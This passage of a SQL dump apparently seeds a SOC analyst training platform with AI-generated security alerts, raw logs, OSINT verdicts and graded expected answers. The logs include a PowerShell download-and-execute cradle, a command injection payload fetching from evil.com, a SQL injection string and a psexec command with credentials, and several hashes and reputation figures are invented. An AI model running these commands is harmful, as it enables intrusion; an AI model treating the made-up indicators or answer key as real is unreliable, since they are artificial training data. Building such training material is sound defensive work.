operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detected use of MSHTA was verified to be legitimate for executing an internal script. No malicious activity was confirmed.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'),
(617, 'Advanced Persistent Threat Detected: Multi-hop C2 Communication via Slack', 'critical', 'CrowdStrike', 'An APT group has been detected using a multi-hop C2 communication channel through Slack to control a compromised system. The attack involves memory-only payloads and process hollowing techniques.', 'Malware', 'T1095', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESKTOP01\",\"command_line\":\"powershell.exe -nop -w hidden -c IEX ((New-Object Net.WebClient).DownloadString(\'https://slack.com/api/secret\'))\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"domain\":\"slack.com\"}', '2026-01-11 06:23:43', '2026-01-11 14:06:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for C2 activities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c IEX ((New-Object Net.WebClient).DownloadString(\'https://slack.com/api/secret\'))\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious PowerShell command indicative of fileless malware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample associated with APT activity\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of Slack as a C2 channel and the memory-only payload suggests a sophisticated APT attack leveraging legitimate services.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(618, 'DGA Domain Detected for Data Exfiltration', 'high', 'Splunk', 'A domain generated algorithmically has been detected, suggesting data exfiltration attempts from an internal server. The domain is associated with fast-flux DNS to evade detection.', 'Data Exfiltration', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:45:10Z\",\"event_type\":\"dns_request\",\"src_ip\":\"10.0.0.25\",\"domain\":\"xkjasd1234.info\",\"username\":\"svc-backup\",\"hostname\":\"SRV-BACKUP01\"}', '2026-01-10 18:00:27', '2026-01-11 14:06:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server involved in suspicious DNS requests\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xkjasd1234.info\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain identified as part of a DGA associated with data exfiltration\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The DGA domain and fast-flux DNS indicate a sophisticated data exfiltration attempt, likely part of an ongoing APT campaign.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'),
(619, 'False Positive: Suspicious Login Attempt from Known Safe Location', 'medium', 'IDS', 'Multiple login failures were detected from an external IP. However, the IP belongs to a known safe location used by a trusted vendor.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:50:42Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.44\",\"dst_ip\":\"192.168.100.5\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC01\",\"failed_attempts\":12}', '2026-01-11 00:32:19', '2026-01-11 14:06:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.44\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP address belongs to a known safe location used by a trusted vendor\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.100.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of domain controller\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login failures originated from a trusted vendor\'s network, confirming benign activity.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'),
(620, 'Phishing Attempt Detected: Spoofed Domain and Malicious URL', 'high', 'Proofpoint', 'A phishing email was received with a spoofed domain and a malicious URL designed to harvest credentials.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:58Z\",\"event_type\":\"email_received\",\"email_sender\":\"noreply@secure-update.com\",\"username\":\"asmith\",\"hostname\":\"CORP-LAPTOP03\",\"url\":\"http://secure-update.com/login\",\"domain\":\"secure-update.com\"}', '2026-01-11 09:03:00', '2026-01-11 14:06:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@secure-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Sender domain spoofed to resemble a legitimate service\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-update.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL identified as phishing site designed to harvest credentials\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"secure-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain reported for phishing activities\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"block_domain\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email\'s spoofed domain and the malicious URL were clearly intended for phishing, confirming the threat.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'),
(621, 'Malware Detected: Known Malicious File Executed', 'critical', 'CrowdStrike', 'A malicious file with a known bad hash was executed on a host system. The file is flagged by multiple antivirus engines indicating its high threat level.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"command_line\":\"C:\\\\malware\\\\badfile.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"domain\":\"maliciousdomain.com\"}', '2026-01-09 22:10:29', '2026-01-11 14:07:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malicious by over 50 antivirus engines.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain is associated with known malware distribution.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a known malicious file hash confirms this is a true positive malware event.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'),
(622, 'Critical Malware Detected: Trojan Executed on Host', 'critical', 'CrowdStrike', 'A known Trojan malware was executed on the host machine. The file hash matches a known malicious hash with 50+ detections on VirusTotal.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"john.doe\",\"hostname\":\"DESKTOP-ABC123\",\"command_line\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Roaming\\\\evil.exe\",\"file_hash\":\"1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef\"}', '2026-01-11 14:07:44', '2026-01-11 14:07:44', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 60 out of 70 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Roaming\\\\evil.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution of known Trojan\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detected file and external IP are confirmed malicious based on multiple OSINT sources, indicating a true positive malware infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'),
(623, 'Critical Malware Detected on Medical Device', 'critical', 'CrowdStrike', 'A known malware signature was detected on a hospital\'s medical device, potentially compromising patient data. Immediate action is required to isolate the device to prevent data exfiltration.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"\",\"username\":\"nurse.jones\",\"hostname\":\"med-device-01\",\"command_line\":\"C:\\\\malware\\\\ransomware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"domain\":\"\",\"url\":\"\",\"email_sender\":\"\"}', '2026-01-11 14:47:48', '2026-01-11 14:47:48', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 60+ AV engines as ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised device\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\ransomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Malicious executable triggered on the device\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is widely recognized as malware, indicating a true positive. Immediate isolation of the device is necessary to prevent further compromise.\"}', 'Novice', 'EDR', 1, 1, 'HEALTHCARE'),
(624, 'Brute Force Attack on EHR System', 'high', 'Wazuh', 'Multiple failed login attempts detected on the Electronic Health Record (EHR) system from a suspicious IP address, suggesting a brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.2.10\",\"username\":\"admin\",\"hostname\":\"ehr-server-01\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":25}', '2026-01-11 14:47:48', '2026-01-11 14:47:48', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of EHR server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Admin account targeted in brute force attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP is known for malicious activity, confirming a true positive brute force attempt. The admin account should have its credentials reset to prevent unauthorized access.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE');
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(625, 'Brute Force Attack Detected from Malicious IP', 'high', 'CrowdStrike', 'A series of failed login attempts were detected from an external IP address known for malicious activities.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"CORP-WORKSTATION1\",\"failed_attempts\":35}', '2026-01-10 01:20:02', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known user account within the organization\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address has a known history of brute force attacks, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'),
(626, 'Malware Detected via EDR Signature', 'critical', 'Carbon Black', 'A malware file with a known signature was detected on a corporate workstation.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.11\",\"dst_ip\":\"\",\"username\":\"asmith\",\"hostname\":\"CORP-WORKSTATION2\",\"command_line\":\"C:\\\\malware\\\\evil.exe\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnopqrst\"}', '2026-01-10 11:52:11', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnopqrst\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malware by 65 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\evil.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file execution path\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches known malware signatures, confirming this as a true positive.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'),
(627, 'Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A phishing email was detected containing a URL that redirects to a malicious site.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"104.244.42.1\",\"email_sender\":\"phisher@maliciousdomain.com\",\"hostname\":\"mail.corp.com\",\"url\":\"http://maliciousdomain.com/login\"}', '2026-01-09 22:15:29', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"malicious\",\"details\":\"Email associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL redirects to known phishing site\"}}],\"expected_actions\":[\"block_url\",\"educate_user\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a URL that redirects to a malicious site, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT'),
(628, 'SQL Injection Attack Detected on Web Server', 'critical', 'Wazuh', 'A SQL injection attempt was detected targeting the corporate web server.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.2\",\"dst_ip\":\"10.0.0.5\",\"hostname\":\"WEB-SERVER1\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 00:24:58', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.2\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"harden_web_server\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request contains a clear SQL injection payload, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'),
(629, 'Suspicious Network Connection Detected', 'medium', 'Firewall', 'A network connection was made to an external IP known for suspicious activities.', 'Network Connection', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.12\",\"dst_ip\":\"185.143.223.42\",\"hostname\":\"CORP-WORKSTATION3\"}', '2026-01-11 09:40:55', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 100 times for suspicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"monitor_traffic\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for suspicious activities, warranting further investigation.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS'),
(630, 'Failed Login Attempts Detected on Internal System', 'low', 'Splunk', 'Multiple failed login attempts were detected from an internal IP address. The source does not show any malicious history.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:10:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.20\",\"username\":\"mwhite\",\"hostname\":\"CORP-SERVER1\",\"failed_attempts\":8}', '2026-01-10 12:00:04', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mwhite\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known internal user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed attempts were from an internal IP with no known malicious history.\"}', 'Novice', 'SIEM', 1, 1, 'TECH'),
(631, 'Email with Potentially Malicious Attachment', 'medium', 'Proofpoint', 'An email was detected with an attachment that could potentially be malicious. The attachment is not flagged by any antivirus engines.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:20:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.5\",\"email_sender\":\"unknown@unknown.com\",\"hostname\":\"mail.corp.com\",\"file_hash\":\"1234567890abcdef1234567890abcdef\"}', '2026-01-09 16:19:52', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"unknown@unknown.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email from an unknown sender\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash not detected as malicious by any antivirus engines\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The attachment is not flagged by any antivirus engines; hence it\'s considered a false positive.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'),
(632, 'Unauthorized PSExec Execution Detected', 'high', 'Wazuh', 'An unauthorized execution of PSExec was detected on an internal server, indicating possible lateral movement.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER2\",\"command_line\":\"psexec \\\\\\\\192.168.1.30 -u admin -p password cmd.exe\"}', '2026-01-10 16:40:16', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.30 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized use of PSExec tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unauthorized execution of PSExec indicates possible lateral movement, confirming this as a true positive.\"}', 'Novice', 'EDR', 1, 1, 'TECH'),
(633, 'False Positive: Suspicious Domain Access', 'low', 'SIEM', 'Access to a domain flagged as suspicious, but further analysis shows no malicious activity.', 'Web Request', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T17:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"\",\"hostname\":\"CORP-WORKSTATION4\",\"domain\":\"safedomain.com\"}', '2026-01-11 09:50:46', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"safedomain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Domain is clean and not associated with any known threats\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The domain access was incorrectly flagged as suspicious; no malicious activity was found.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT'),
(634, 'Command Injection Attempt Detected', 'critical', 'IDS', 'A command injection attempt was detected targeting a web application.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T18:10:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"10.0.0.10\",\"hostname\":\"WEB-APP1\",\"request_body\":\"id; wget http://evil.com/malware.sh\"}', '2026-01-11 00:35:15', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple command injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id; wget http://evil.com/malware.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"harden_web_server\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request contains a command injection payload, confirming this as a true positive.\"}', 'Novice', 'MAL', 1, 1, 'TECH'),
(635, 'Outbound Connection to Known Malicious IP', 'high', 'Firewall', 'An outbound connection was detected to an IP address with known malicious activities.', 'Data Exfiltration', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T19:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.21\",\"dst_ip\":\"203.0.113.99\",\"hostname\":\"CORP-WORKSTATION5\"}', '2026-01-11 11:18:33', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.21\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"monitor_traffic\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for data exfiltration, confirming this as a true positive.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS'),
(636, 'Malware Detected via IPS Signature', 'critical', 'IDS/IPS', 'A known malware signature was detected in network traffic.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T20:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.22\",\"dst_ip\":\"192.168.1.5\",\"hostname\":\"CORP-WORKSTATION6\",\"file_hash\":\"efgh5678abcd1234ijkl9012mnopqrst\"}', '2026-01-11 00:34:12', '2026-01-11 14:51:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"efgh5678abcd1234ijkl9012mnopqrst\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malware by 70 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches known malware signatures, confirming this as a true positive.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS'),
